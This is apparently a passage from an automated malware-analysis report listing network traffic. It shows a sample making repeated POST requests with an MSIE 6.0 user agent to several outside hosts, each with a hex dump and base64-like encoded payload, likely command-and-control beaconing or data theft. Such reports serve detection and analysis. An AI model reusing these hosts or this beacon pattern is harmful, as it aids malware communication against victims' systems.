44 54 6c 39 44 56 6b 47 36 77 4c 49 61 53 6f 4a 68 5a 52 37 4c 46 59 32 38 52 6d 33 49 6d 74 41 32 6f 5a 35 72 57 71 54 50 6e 62 6c 4e 53 4f 4b 33 41 39 58 45 38 72 77 69 39 6d 45 49 44 42 42 38 6f 66 63 42 53 37 78 6b 33 33 69 51 2f 79 4d 59 54 6a 4f 66 58 67 49 2f 7a 6d 36 58 47 48 64 79 4a 48 42 5a 4a 37 4a 61 62 77 57 2b 71 59 50 66 43 70 30 43 62 71 6c 73 58 75 6a 4a 38 63 6a 45 6d 57 4a 39 63 67 58 46 62 4a 39 61 57 36 30 43 39 53 39 68 56 33 47 78 57 39 78 35 41 5a 48 49 30 73 6c 59 2f 34 71 4d 37 44 57 78 50 62 4e 32 2f 77 68 66 2b 74 77 4a 71 52 51 46 42 4f 30 54 54 38 58 54 62 45 58 4a 4a 4e 76 44 71 54 6c 41 49 49 50 7a 70 35 37 36 2f 6c 4c 74 78 62 35 79 78 4f 64 6d 6b 68 38 55 75 7a 41 45 65 47 5a 6d 46 33 6a 6c 46 2b 4e 70 4c 32 4a 58 44 43 6f 58 41 72 4e 6f 71 62 43 67 50 73 44 79 6f 30 78 51 6d 50 7a 4b 77 61 6f 6f 4d 6a 2b 75 58 74 48 6a 50 2f 51 73 50 37 53 35 77 53 47 36 64 71 53 4c 37 4d 6e 71 39 33 78 44 75 4b 79 78 6d 35 39 42 38 75 37 63 44 2f 5a 30 73 57 32 6e 51 4c 63 50 36 38 70 55 31 49 34 68 77 50 72 51 30 53 73 58 77 67 50 59 5a 38 6e 64 35 67 7a 53 78 72 34 52 7a 33 4e 37 6d 6e 56 36 31 5a 52 46 33 48 74 41 50 71 55 57 4f 6c 48 6c 4e 43 69 49 4e 34 49 52 51 46 35 30 77 74 34 43 34 42 79 48 52 77 48 43 43 51 77 42 6e 57 6a 61 35 48 69 33 4d 45 78 67 68 37 73 59 35 67 4c 38 55 54 59 44 59 74 6c 2b 79 6c 76 43 78 64 39 44 63 6d 57 2b 6b 31 30 4e 52 47 7a 6f 76 49 38 65 30 3d Data Ascii: CJrDOakNWiDGmsJyePrzF8LroytH7PCW7SovpvL5lhoiQFA5tIz+8A+EV7BWtHqIMyJCXSUuxeB4e+h7eR5NAG6jGes2XqfjjE9tQr0K3Kit+/IULDTl9DVkG6wLIaSoJhZR7LFY28Rm3ImtA2oZ5rWqTPnblNSOK3A9XE8rwi9mEIDBB8ofcBS7xk33iQ/yMYTjOfXgI/zm6XGHdyJHBZJ7JabwW+qYPfCp0CbqlsXujJ8cjEmWJ9cgXFbJ9aW60C9S9hV3GxW9x5AZHI0slY/4qM7DWxPbN2/whf+twJqRQFBO0TT8XTbEXJJNvDqTlAIIPzp576/lLtxb5yxOdmkh8UuzAEeGZmF3jlF+NpL2JXDCoXArNoqbCgPsDyo0xQmPzKwaooMj+uXtHjP/QsP7S5wSG6dqSL7Mnq93xDuKyxm59B8u7cD/Z0sW2nQLcP68pU1I4hwPrQ0SsXwgPYZ8nd5gzSxr4Rz3N7mnV61ZRF3HtAPqUWOlHlNCiIN4IRQF50wt4C4ByHRwHCCQwBnWja5Hi3MExgh7sY5gL8UTYDYtl+ylvCxd9DcmW+k10NRGzovI8e0=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 46 66 52 73 6a 52 4e 48 6e 79 42 45 65 50 41 4a 32 69 47 79 53 37 7a 71 4b 45 2f 35 65 72 4e 49 39 78 31 4e 49 65 6d 4d 48 70 74 45 45 50 76 74 55 6c 62 48 7a 6a 61 41 68 34 56 78 2f 71 6f 72 4d 30 53 71 66 4c 52 30 71 72 75 75 4b 32 6e 57 48 37 37 78 79 4c 43 57 32 4a 4d 58 76 72 6b 53 47 66 6f 62 53 53 38 33 54 37 33 37 6c 53 41 68 6d 4c 58 39 37 50 2f 64 55 54 39 49 6d 35 61 65 31 64 52 57 73 37 34 54 6b 58 37 79 36 6f 79 48 63 6c 45 31 79 4f 6b 70 69 34 77 34 2f 6c 68 63 31 4b 46 59 43 75 38 43 48 54 62 44 36 57 54 58 4a 44 59 4d 74 59 47 4d 31 35 68 31 72 6c 41 30 6b 55 79 4b 58 2b 2b 51 4f 61 39 4a 55 65 42 71 4a 32 32 43 6a 73 37 34 48 75 56 61 4b 74 61 5a 77 44 71 78 6b 70 73 56 77 38 34 4f 53 50 4c 4f 42 32 62 78 38 4c 34 33 36 70 30 79 2f 4f 70 6a 71 48 58 51 41 4b 66 79 41 59 6b 48 66 52 6c 75 45 54 66 49 6a 70 56 77 6d 79 34 66 71 4f 35 2f 5a 70 4b 46 46 67 6a 75 51 79 36 2f 32 44 50 32 46 59 4f 69 42 33 2f 61 78 63 6e 31 4b 45 33 44 69 62 77 67 49 37 35 31 39 34 44 41 46 45 6a 77 45 4c 66 53 4d 75 35 37 4a 33 74 6b 58 36 72 32 58 6a 6c 6b 66 36 47 39 46 36 62 76 44 69 77 4c 6c 6e 55 33 4e 41 68 44 62 34 7a 58 62 5a 50 43 6b 45 52 47 32 39 53 31 43 50 48 65 38 47 77 6b 56 56 49 78 76 65 42 74 6c 67 5a 69 51 4e 36 75 35 49 61 6a 65 36 67 39 6a 30 44 39 35 6a 6f 4c 6e 46 32 75 57 4f 38 6e 34 6a 68 74 72 7a 76 4d 55 50 4f 4b 47 38 2f 55 6b 47 65 79 65 6f 41 7a 37 77 68 47 6c 41 66 39 6d 70 61 79 46 55 52 7a 59 69 39 77 51 70 39 54 31 52 36 68 79 4e 74 4a 70 6f 49 37 66 52 31 71 5a 45 65 58 72 6b 39 56 43 49 66 72 66 6e 6a 70 75 71 55 52 63 58 58 37 34 79 42 42 6b 75 64 47 4d 64 4f 36 32 33 53 57 36 6f 44 6b 31 44 6f 6e 35 2f 57 6b Data Ascii: FfRsjRNHnyBEePAJ2iGyS7zqKE/5erNI9x1NIemMHptEEPvtUlbHzjaAh4Vx/qorM0SqfLR0qruuK2nWH77xyLCW2JMXvrkSGfobSS83T737lSAhmLX97P/dUT9Im5ae1dRWs74TkX7y6oyHclE1yOkpi4w4/lhc1KFYCu8CHTbD6WTXJDYMtYGM15h1rlA0kUyKX++QOa9JUeBqJ22Cjs74HuVaKtaZwDqxkpsVw84OSPLOB2bx8L436p0y/OpjqHXQAKfyAYkHfRluETfIjpVwmy4fqO5/ZpKFFgjuQy6/2DP2FYOiB3/axcn1KE3DibwgI75194DAFEjwELfSMu57J3tkX6r2Xjlkf6G9F6bvDiwLlnU3NAhDb4zXbZPCkERG29S1CPHe8GwkVVIxveBtlgZiQN6u5Iaje6g9j0D95joLnF2uWO8n4jhtrzvMUPOKG8/UkGeyeoAz7whGlAf9mpayFURzYi9wQp9T1R6hyNtJpoI7fR1qZEeXrk9VCIfrfnjpuqURcXX74yBBkudGMdO623SW6oDk1Don5/Wk
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 78 34 31 59 55 67 4c 61 57 69 42 51 59 56 64 66 39 64 45 61 58 6f 58 4f 45 69 67 53 68 73 4f 37 56 6a 67 59 46 73 32 52 59 75 56 41 2b 74 64 38 31 54 48 77 61 44 37 50 59 6b 5a 79 58 78 59 6e 4b 33 30 4e 64 74 41 36 2b 6e 34 6a 44 68 47 61 56 6f 67 46 44 49 71 41 67 33 4f 70 43 33 72 41 36 75 55 54 74 59 6d 6e 34 61 70 45 62 51 38 34 45 50 65 61 6d 58 64 33 75 65 30 4d 4b 44 68 70 75 38 56 4f 44 6b 47 74 41 35 32 71 63 37 79 47 39 6b 74 4d 4a 6f 76 65 68 76 74 65 32 45 66 2b 61 53 42 46 4f 4b 6d 71 79 5a 6b 34 39 59 6d 39 74 48 79 2b 2b 4c 53 31 4e 65 47 37 43 6f 68 4e 30 64 31 52 35 6a 30 6a 6e 46 4b 67 70 36 53 35 6a 78 32 2f 59 6b 4c 57 70 54 6e 4d 4f 4f 36 34 31 46 55 34 44 53 2f 54 4d 48 39 72 6e 4f 31 43 34 4b 30 32 4a 75 47 57 50 77 46 76 42 62 58 6e 73 6d 5a 52 75 78 54 38 71 6c 4a 4e 4a 2b 6a 2b 4d 47 45 39 44 6f 52 53 43 57 66 2b 46 6c 30 33 49 49 65 4d 73 31 66 72 72 43 4e 49 69 49 52 4b 30 2b 64 54 39 57 43 32 63 57 78 34 39 45 6a 48 4c 59 56 49 69 54 74 73 4c 31 49 4f 43 54 4d 6f 57 36 76 52 38 31 48 43 77 39 38 65 71 44 44 51 4c 51 51 30 48 41 65 73 57 6a 65 50 68 69 37 4a 71 57 67 2f 73 46 50 4e 66 34 2f 58 41 36 44 66 51 49 51 6d 6a 32 47 52 59 31 6a 38 57 33 46 46 58 57 7a 48 43 32 61 44 4e 41 38 35 63 50 4e 76 36 32 44 72 4f 31 4d 52 46 56 2f 31 36 4f 64 70 57 4f 50 6d 67 78 44 70 74 6f 48 4c 61 4d 4a 4a 4a 73 73 49 63 6c 61 43 33 56 65 49 31 75 47 56 49 48 6c 64 72 41 5a 32 4c 54 75 4c 72 53 71 38 65 64 4e 6f 37 2f 61 50 59 30 76 31 64 50 61 6a 48 49 6f 73 68 30 32 50 46 7a 79 73 39 78 33 69 6c 50 38 2f 50 6e 63 77 58 47 36 64 49 46 74 4a 53 63 59 66 62 7a 61 37 Data Ascii: x41YUgLaWiBQYVdf9dEaXoXOEigShsO7VjgYFs2RYuVA+td81THwaD7PYkZyXxYnK30NdtA6+n4jDhGaVogFDIqAg3OpC3rA6uUTtYmn4apEbQ84EPeamXd3ue0MKDhpu8VODkGtA52qc7yG9ktMJovehvte2Ef+aSBFOKmqyZk49Ym9tHy++LS1NeG7CohN0d1R5j0jnFKgp6S5jx2/YkLWpTnMOO641FU4DS/TMH9rnO1C4K02JuGWPwFvBbXnsmZRuxT8qlJNJ+j+MGE9DoRSCWf+Fl03IIeMs1frrCNIiIRK0+dT9WC2cWx49EjHLYVIiTtsL1IOCTMoW6vR81HCw98eqDDQLQQ0HAesWjePhi7JqWg/sFPNf4/XA6DfQIQmj2GRY1j8W3FFXWzHC2aDNA85cPNv62DrO1MRFV/16OdpWOPmgxDptoHLaMJJJssIclaC3VeI1uGVIHldrAZ2LTuLrSq8edNo7/aPY0v1dPajHIosh02PFzys9x3ilP8/PncwXG6dIFtJScYfbza7
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 30 44 6c 35 37 70 47 66 33 43 41 6a 78 70 6a 79 4d 4e 4e 66 5a 4f 71 5a 42 54 46 50 36 4d 6f 76 56 53 39 30 34 4a 6e 48 58 46 43 32 6e 38 4a 4d 49 4c 44 38 30 70 6d 79 36 57 50 6b 41 44 33 6d 6f 6f 57 48 6d 4c 41 46 54 47 70 39 6e 57 54 79 4d 2f 75 68 41 6d 4a 61 37 6a 2b 6f 36 50 46 35 2b 34 35 63 7a 50 6e 52 45 6f 72 38 6f 41 49 37 4c 34 48 51 7a 4b 65 2f 6d 72 51 43 36 75 4c 42 66 55 33 45 64 33 75 2f 78 6a 6e 56 6e 5a 79 47 31 77 6f 43 34 35 77 57 2f 6f 77 6c 51 7a 7a 50 46 30 6d 62 30 37 70 56 4c 4c 4f 7a 4c 47 35 53 73 39 6a 49 6c 42 30 34 69 59 4d 74 61 59 54 38 39 70 6b 74 55 66 33 72 6b 49 55 45 65 37 45 2b 4a 42 34 4f 6b 6e 55 72 6c 56 2b 73 63 46 2b 4b 47 64 6f 4f 77 4c 6d 39 4c 2f 55 64 75 62 57 55 42 62 54 34 34 64 4c 65 39 4f 48 71 6f 4e 6a 50 4f 4e 77 50 75 46 71 79 69 77 33 37 56 30 35 76 36 48 35 56 79 46 4e 59 38 4b 51 6e 68 61 69 6b 63 4a 52 6f 69 49 51 4a 31 55 50 53 6f 61 7a 67 68 48 4d 73 59 75 6b 5a 46 56 6a 62 6b 64 65 71 59 68 53 5a 79 76 55 70 42 55 76 5a 74 79 57 76 35 54 46 73 61 4e 6a 52 53 36 34 4f 65 66 36 33 79 56 4d 47 4a 47 34 64 31 4b 53 6e 38 69 2f 53 6e 58 79 5a 73 6d 4d 41 5a 56 78 51 61 5a 6d 76 35 38 50 50 35 4d 37 49 71 59 70 69 32 55 76 51 37 33 32 45 34 48 42 67 51 79 39 61 54 6b 57 59 43 6c 2b 31 34 4c 4a 64 2b 42 39 71 45 6d 75 6f 72 55 70 4d 43 2f 55 6f 49 4e 54 56 59 52 46 69 34 59 35 32 69 76 74 35 6d 77 49 51 77 48 30 74 68 4d 6b 7a 42 50 4c 34 49 38 63 68 42 55 2b 41 70 35 6f 43 4d 47 79 73 46 35 4b 77 71 58 36 57 42 79 6d 34 50 6d 48 36 4f 48 6b 38 54 43 37 58 57 57 6f 33 37 43 4e 66 55 47 41 6e 51 42 54 41 6e 73 61 31 4a 6b 56 7a 79 75 4c 6d 67 71 4f 31 4b 6d 2f 4c 31 32 50 48 58 57 4b 66 Data Ascii: 0Dl57pGf3CAjxpjyMNNfZOqZBTFP6MovVS904JnHXFC2n8JMILD80pmy6WPkAD3mooWHmLAFTGp9nWTyM/uhAmJa7j+o6PF5+45czPnREor8oAI7L4HQzKe/mrQC6uLBfU3Ed3u/xjnVnZyG1woC45wW/owlQzzPF0mb07pVLLOzLG5Ss9jIlB04iYMtaYT89pktUf3rkIUEe7E+JB4OknUrlV+scF+KGdoOwLm9L/UdubWUBbT44dLe9OHqoNjPONwPuFqyiw37V05v6H5VyFNY8KQnhaikcJRoiIQJ1UPSoazghHMsYukZFVjbkdeqYhSZyvUpBUvZtyWv5TFsaNjRS64Oef63yVMGJG4d1KSn8i/SnXyZsmMAZVxQaZmv58PP5M7IqYpi2UvQ732E4HBgQy9aTkWYCl+14LJd+B9qEmuorUpMC/UoINTVYRFi4Y52ivt5mwIQwH0thMkzBPL4I8chBU+Ap5oCMGysF5KwqX6WBym4PmH6OHk8TC7XWWo37CNfUGAnQBTAnsa1JkVzyuLmgqO1Km/L12PHXWKf
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 51 62 39 55 45 44 42 4b 42 79 48 71 30 6b 6a 50 51 39 63 4d 45 4f 4e 67 53 54 37 59 62 4b 46 4c 5a 41 79 37 74 42 6a 68 68 6f 76 42 58 79 76 6e 2b 75 2f 32 4e 78 4c 2f 50 39 5a 41 64 4a 7a 4d 6d 6b 4b 48 46 34 36 44 65 64 6e 4e 64 55 37 4b 49 36 43 62 6d 39 47 31 5a 38 48 33 54 32 45 6f 48 76 49 52 75 36 79 65 6c 4f 6b 4d 45 6e 6d 43 2b 4f 73 50 46 48 35 4b 38 39 68 51 76 62 42 55 30 6a 53 30 75 45 61 4e 54 75 2b 51 37 4f 66 58 55 6f 45 37 2b 4b 36 50 68 70 58 62 58 6e 78 6d 4b 44 41 4b 79 77 55 37 6b 32 61 77 78 35 45 4f 59 66 36 50 59 78 70 64 69 58 73 67 78 33 69 68 72 50 58 46 4c 71 77 39 76 6d 6a 54 6e 31 6a 41 62 67 4f 4f 6f 38 6e 38 6c 6b 79 36 66 41 45 75 73 65 7a 4d 77 72 6e 46 53 32 66 70 71 7a 74 32 6e 32 55 38 30 66 70 4a 58 46 61 49 32 57 5a 73 66 61 32 79 69 71 78 71 76 6c 32 67 55 46 47 79 76 47 45 73 38 4f 79 41 56 33 73 53 68 34 49 36 65 6b 57 79 37 73 36 41 74 50 31 77 39 4b 36 44 7a 37 39 55 45 44 78 52 75 47 41 71 34 62 4f 47 6d 33 46 70 46 53 79 62 39 72 47 6c 45 50 77 31 61 44 58 47 58 46 73 2b 78 48 35 6d 34 65 52 2b 54 76 4c 6c 51 44 6a 36 66 57 48 62 37 30 6a 44 2f 56 75 45 48 33 44 53 50 4a 32 67 33 41 30 46 42 58 75 30 75 39 79 2f 6e 35 6f 47 50 6d 6c 67 45 47 68 49 4a 4b 71 73 49 75 59 37 48 43 59 37 58 67 4f 32 56 76 73 34 45 48 70 68 7a 46 62 41 67 77 4a 43 59 4e 42 4c 41 31 70 44 45 61 2b 33 51 2f 31 46 2b 53 50 42 31 44 45 64 6d 4e 54 6a 50 44 67 6a 30 41 6e 6a 31 4a 41 71 4c 75 75 42 53 71 2b 77 78 73 54 55 49 77 6e 39 76 32 6e 36 34 31 77 72 71 50 6d 35 63 73 41 6b 64 45 64 46 57 74 63 34 37 65 67 71 45 41 68 6d 63 69 7a 46 4c 72 75 66 34 38 79 64 33 5a 73 78 51 4b 75 2f 69 57 64 4f 31 6c 63 3d Data Ascii: Qb9UEDBKByHq0kjPQ9cMEONgST7YbKFLZAy7tBjhhovBXyvn+u/2NxL/P9ZAdJzMmkKHF46DednNdU7KI6Cbm9G1Z8H3T2EoHvIRu6yelOkMEnmC+OsPFH5K89hQvbBU0jS0uEaNTu+Q7OfXUoE7+K6PhpXbXnxmKDAKywU7k2awx5EOYf6PYxpdiXsgx3ihrPXFLqw9vmjTn1jAbgOOo8n8lky6fAEusezMwrnFS2fpqzt2n2U80fpJXFaI2WZsfa2yiqxqvl2gUFGyvGEs8OyAV3sSh4I6ekWy7s6AtP1w9K6Dz79UEDxRuGAq4bOGm3FpFSyb9rGlEPw1aDXGXFs+xH5m4eR+TvLlQDj6fWHb70jD/VuEH3DSPJ2g3A0FBXu0u9y/n5oGPmlgEGhIJKqsIuY7HCY7XgO2Vvs4EHphzFbAgwJCYNBLA1pDEa+3Q/1F+SPB1DEdmNTjPDgj0Anj1JAqLuuBSq+wxsTUIwn9v2n641wrqPm5csAkdEdFWtc47egqEAhmcizFLruf48yd3ZsxQKu/iWdO1lc=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 33 41 32 76 47 46 4c 42 51 53 47 59 79 6b 4a 35 42 58 44 4f 41 46 56 43 49 6f 57 69 78 77 48 74 70 6e 52 71 47 4d 4b 52 48 6f 37 49 62 39 4e 39 54 5a 2f 49 37 73 38 4c 56 52 75 55 67 4b 54 54 68 47 4d 54 46 4d 32 4e 77 54 33 52 6f 67 48 49 4f 36 63 61 2f 62 66 61 33 49 61 48 6e 69 47 58 44 5a 66 4a 4e 63 71 38 39 54 69 72 79 34 66 56 63 37 35 67 42 30 52 71 36 55 2b 54 2f 76 49 61 49 32 4f 4b 6e 5a 4a 77 53 37 6b 65 2f 6e 4a 6d 61 76 76 43 45 66 6d 38 69 45 45 79 76 62 6f 42 66 75 7a 68 61 64 44 72 57 53 64 58 75 61 35 50 78 39 32 50 6c 2b 53 72 36 77 71 61 51 38 52 32 64 31 4b 67 7a 79 36 34 41 2b 32 7a 53 36 2b 58 55 4c 63 6d 42 49 31 55 6f 39 75 72 76 30 50 34 4f 62 63 39 75 35 6f 63 38 41 6c 2b 48 2b 75 67 39 73 4e 74 66 69 76 70 58 33 70 4c 78 4c 68 48 59 4e 33 7a 47 6a 34 42 4d 57 79 33 41 69 59 44 50 35 34 6c 76 68 49 68 2f 47 66 33 43 58 53 79 39 42 76 6a 37 31 61 33 57 65 73 4a 62 32 52 43 41 54 49 70 31 50 6f 4d 69 79 64 52 65 69 65 6e 49 48 4d 67 67 61 43 41 7a 33 65 5a 53 4c 37 38 58 2f 65 59 48 79 67 79 49 34 37 72 52 61 56 30 7a 70 34 31 4b 54 68 37 64 32 61 58 62 53 37 54 55 48 58 62 76 78 77 6c 43 61 4f 31 4e 66 6a 43 50 47 48 4e 72 51 79 44 67 4e 73 41 75 6e 6e 4d 5a 4e 33 4f 52 6f 69 65 68 51 30 62 6e 4a 79 47 6b 55 74 56 46 50 31 4b 56 32 4a 78 68 71 32 34 6d 4c 6a 76 71 30 67 56 34 58 31 43 54 46 47 6e 65 71 6e 32 54 33 76 5a 4b 57 66 32 61 6c 6d 2f 35 32 5a 56 2b 79 78 61 5a 59 55 45 59 4a 55 65 32 38 77 6d 6e 4c 42 66 45 6d 30 6e 36 33 6c 6c 57 4c 50 67 73 50 2b 68 34 6c 50 4e 7a 44 48 4c 67 58 36 58 4b 69 6c 6f 2b 41 78 37 50 52 39 4f 46 2b 41 43 74 72 4e 77 49 38 2f 68 6a 64 4c 5a 62 47 56 75 6a 41 4b 33 77 33 76 44 77 4d 35 52 6d 58 6e 74 57 37 73 2b 32 36 69 45 54 72 51 49 54 79 66 58 71 53 31 34 74 67 3d 3d Data Ascii: 3A2vGFLBQSGYykJ5BXDOAFVCIoWixwHtpnRqGMKRHo7Ib9N9TZ/I7s8LVRuUgKTThGMTFM2NwT3RogHIO6ca/bfa3IaHniGXDZfJNcq89Tiry4fVc75gB0Rq6U+T/vIaI2OKnZJwS7ke/nJmavvCEfm8iEEyvboBfuzhadDrWSdXua5Px92Pl+Sr6wqaQ8R2d1Kgzy64A+2zS6+XULcmBI1Uo9urv0P4Obc9u5oc8Al+H+ug9sNtfivpX3pLxLhHYN3zGj4BMWy3AiYDP54lvhIh/Gf3CXSy9Bvj71a3WesJb2RCATIp1PoMiydReienIHMggaCAz3eZSL78X/eYHygyI47rRaV0zp41KTh7d2aXbS7TUHXbvxwlCaO1NfjCPGHNrQyDgNsAunnMZN3ORoiehQ0bnJyGkUtVFP1KV2Jxhq24mLjvq0gV4X1CTFGneqn2T3vZKWf2alm/52ZV+yxaZYUEYJUe28wmnLBfEm0n63llWLPgsP+h4lPNzDHLgX6XKilo+Ax7PR9OF+ACtrNwI8/hjdLZbGVujAK3w3vDwM5RmXntW7s+26iETrQITyfXqS14tg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 67 63 63 47 5a 39 32 63 54 43 46 44 30 4d 35 4a 46 50 68 6e 78 52 59 68 6d 2f 61 4c 6a 59 6e 2f 59 54 4e 65 6b 6a 35 38 4b 45 5a 62 6c 47 71 33 64 6f 55 68 61 45 70 31 77 51 6a 4f 38 62 57 69 74 43 39 4c 72 49 72 30 74 67 49 56 2f 66 77 45 57 72 78 2b 49 79 6b 47 70 6a 46 63 63 50 4d 72 42 44 77 56 2f 54 59 39 71 55 71 31 70 64 54 43 71 38 7a 6b 43 5a 30 73 7a 5a 62 54 76 59 67 31 55 61 66 76 6e 2b 49 33 53 4f 57 35 34 46 4f 32 52 75 39 59 2b 74 66 63 6d 7a 36 5a 44 41 2b 50 53 67 4a 5a 43 46 35 5a 33 79 41 53 2f 6c 49 7a 73 77 79 47 4c 56 4e 4f 4d 47 65 5a 4a 51 4f 74 5a 2b 42 6f 39 42 58 45 79 62 59 68 2b 33 4f 64 49 67 37 57 4c 4b 32 32 78 31 47 53 43 74 32 5a 71 71 6d 49 63 47 68 6b 36 56 42 2f 4b 58 6b 47 75 2b 34 46 6e 2f 65 4b 69 6c 59 35 6e 6e 66 66 61 52 51 33 6f 36 41 79 4c 70 61 63 50 38 77 57 36 56 32 41 35 48 69 2f 51 57 4a 48 4b 76 55 31 36 78 45 6a 59 76 38 45 69 37 48 53 48 50 4c 72 46 45 74 56 54 64 50 59 31 42 58 79 6b 46 47 74 68 44 56 43 35 65 35 2b 6a 41 6e 62 57 73 6a 49 6b 4d 30 36 37 48 48 68 42 72 6e 58 69 75 65 79 55 4c 38 75 64 78 31 47 77 58 47 41 2b 74 4a 7a 79 47 63 75 44 51 44 59 52 74 49 4c 79 41 66 35 71 47 4e 42 65 76 71 53 6c 4a 72 37 6f 59 6e 4d 75 54 7a 2f 50 72 6c 69 76 75 2f 35 79 67 58 44 52 50 63 77 58 37 63 33 4c 65 65 49 5a 37 62 36 4d 59 59 54 54 56 2f 50 61 36 42 6e 55 6b 4e 38 73 4a 4f 65 66 65 4c 59 53 34 45 37 73 62 6b 7a 39 45 51 65 48 44 4a 6d 4f 62 49 74 66 43 4b 5a 39 4b 5a 6c 55 61 6b 4d 4f 68 6e 33 2b 54 34 6d 44 73 6d 56 7a 69 6b 67 75 31 73 6a 37 42 79 49 44 2f 47 64 6e 6d 4a 5a 35 44 62 50 77 50 43 77 56 2b 62 54 30 6e 55 30 35 74 36 4a 64 49 7a 2b 69 7a 56 6b 4b 34 73 6b 6d 4f 45 42 41 31 39 4b 53 6e 55 53 56 63 42 78 54 4b 61 61 39 38 38 74 46 72 4e 63 64 54 4b 4c 4a 77 3d 3d Data Ascii: gccGZ92cTCFD0M5JFPhnxRYhm/aLjYn/YTNekj58KEZblGq3doUhaEp1wQjO8bWitC9LrIr0tgIV/fwEWrx+IykGpjFccPMrBDwV/TY9qUq1pdTCq8zkCZ0szZbTvYg1Uafvn+I3SOW54FO2Ru9Y+tfcmz6ZDA+PSgJZCF5Z3yAS/lIzswyGLVNOMGeZJQOtZ+Bo9BXEybYh+3OdIg7WLK22x1GSCt2ZqqmIcGhk6VB/KXkGu+4Fn/eKilY5nnffaRQ3o6AyLpacP8wW6V2A5Hi/QWJHKvU16xEjYv8Ei7HSHPLrFEtVTdPY1BXykFGthDVC5e5+jAnbWsjIkM067HHhBrnXiueyUL8udx1GwXGA+tJzyGcuDQDYRtILyAf5qGNBevqSlJr7oYnMuTz/Prlivu/5ygXDRPcwX7c3LeeIZ7b6MYYTTV/Pa6BnUkN8sJOefeLYS4E7sbkz9EQeHDJmObItfCKZ9KZlUakMOhn3+T4mDsmVzikgu1sj7ByID/GdnmJZ5DbPwPCwV+bT0nU05t6JdIz+izVkK4skmOEBA19KSnUSVcBxTKaa988tFrNcdTKLJw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 33 41 32 76 47 46 4c 42 51 53 47 59 79 6b 4a 35 42 58 44 4f 41 46 56 43 49 6f 57 69 78 77 48 74 70 6e 52 71 47 4d 4b 52 48 6f 37 49 62 39 4e 39 54 5a 2f 49 37 73 38 4c 56 52 75 55 67 4b 54 54 68 47 4d 54 46 4d 32 4e 77 54 33 52 6f 67 48 49 4f 36 63 61 2f 62 66 61 33 49 61 48 6e 69 47 58 44 5a 66 4a 4e 63 71 38 39 54 69 72 79 34 66 56 63 37 35 67 42 30 52 71 36 55 2b 54 2f 76 49 61 49 32 4f 4b 6e 5a 4a 77 53 37 6b 65 2f 6e 4a 6d 61 76 76 43 45 66 6d 38 69 45 45 79 76 62 6f 42 66 75 7a 68 61 64 44 72 57 53 64 58 75 61 35 50 78 39 32 50 6c 2b 53 72 36 77 71 61 51 38 52 32 64 31 4b 67 7a 79 36 34 41 2b 32 7a 53 36 2b 58 55 4c 63 6d 42 49 31 55 6f 39 75 72 76 30 50 34 4f 62 63 39 75 35 6f 63 38 41 6c 2b 48 2b 75 67 39 73 4e 74 66 69 76 70 58 33 70 4c 78 4c 68 48 59 4e 33 7a 47 6a 34 42 4d 57 79 33 41 69 59 44 50 35 34 6c 76 68 49 68 2f 47 66 33 43 58 53 79 39 42 76 6a 37 31 61 33 57 65 73 4a 62 32 52 43 41 54 49 70 31 50 6f 4d 69 79 64 52 65 69 65 6e 49 48 4d 67 67 61 43 41 7a 33 65 5a 53 4c 37 38 58 2f 65 59 48 79 67 79 49 34 37 72 52 61 56 30 7a 70 34 31 4b 54 68 37 64 32 61 58 62 53 37 54 55 48 58 62 76 78 77 6c 43 61 4f 31 4e 66 6a 43 50 47 48 4e 72 51 79 44 67 4e 73 41 75 6e 6e 4d 5a 4e 33 4f 52 6f 69 65 68 51 30 62 6e 4a 79 47 6b 55 74 56 46 50 31 4b 56 32 4a 78 68 71 32 34 6d 4c 6a 76 71 30 67 56 34 58 31 43 54 46 47 6e 65 71 6e 32 54 33 76 5a 4b 57 66 32 61 6c 6d 2f 35 32 5a 56 2b 79 78 61 5a 59 55 45 59 4a 55 65 32 38 77 6d 6e 4c 42 66 45 6d 30 6e 36 33 6c 6c 57 4c 50 67 73 50 2b 68 34 6c 50 4e 7a 44 48 4c 67 58 36 58 4b 69 6c 6f 2b 41 78 37 50 52 39 4f 46 2b 41 43 74 72 4e 77 49 38 2f 68 6a 64 4c 5a 62 47 56 75 6a 41 4b 33 77 33 76 44 77 4d 35 52 6d 58 6e 74 57 37 73 2b 32 36 69 45 54 72 51 49 54 79 66 58 71 53 31 34 74 67 3d 3d Data Ascii: 